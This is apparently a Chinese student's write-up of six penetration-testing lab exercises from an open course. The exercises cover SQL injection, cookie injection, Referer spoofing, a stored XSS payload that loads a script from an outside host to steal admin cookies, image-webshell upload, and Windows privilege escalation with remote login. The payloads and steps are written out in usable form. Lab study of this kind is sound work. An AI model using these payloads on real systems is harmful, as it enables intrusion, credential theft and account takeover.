浪小灰灰学习笔记
公开课靶场作业笔记
第一章 为了女生小芳
1. 点击传送门进入
2. 点击查看新闻 输入and 1=2或者id=1 后加任意字符,看是否报错和报错情况
3. 由此可以知道,这里可能存在sql注入漏洞
4. 测试一下有多少个字段order by @@ 折半寻找
5. 联合查询 and 1=2 union select 1,@@database 或者@@version
6. 库版本和库名可以查询出当前库下表名
7. union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()
8. and 1=2 union select 1,password from admin.
第二章
1.进入网站,发现是一个asp的网站
2.and 1=2 测试是否有拦截,页面显示传参错误,order by 可用
3.回去看了一下视频和文章,发现可以用cookie。将参数值用cookie传递,可以绕过这题过滤。
4.其余步骤如第一题,注意cookie中需要用+号代替空格
5.得到一串md5加密字符,百度MD5,然后登录网站。
第三题
1.进入网站后台,登录显示页面提示不允许从外部链接访问
2.http包头中有referer,来源请求的网页。Host等
3.修改http包中的数据,登录进入。思路来自于提示和课堂
第四题
1.传送,题目提示有xss,去留言区插入
</tExtArEa>'"><sCRiPt sRC=http://xss.fbisb.com/QdHG></sCrIpT>
先提前建立好项目,管理员查看留言时,会盗取管理员cookie到自己的项目里,得到flag。
第五题
1. 通过cookie登录后台。
2. 寻找可以上传的地方,发现大部分地方都不能修改,不能直接上传脚本,寻找上传图片和修改图片的地方,上传一个图片码,用菜刀链接,得到flag
第六题
1. 菜刀链接,发现需要得到的flag的目录有权限,自己权限不够。
2. 上传一个大码,这个不行。。看了解析。上传iis6和cmd两个可执行文件
3. 使用其内部的cmd命令行,用iis6.exe 命令 whoami查看权限,权限可以
4. 创建一个用户,将其增加到administators用户组里,权限可以
5. Tasklist -svc 查找远程服务登录是否启用,确定启用。按照pid寻找到其对应的端口netstat -ano。然后用自己的计算机远程登录
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.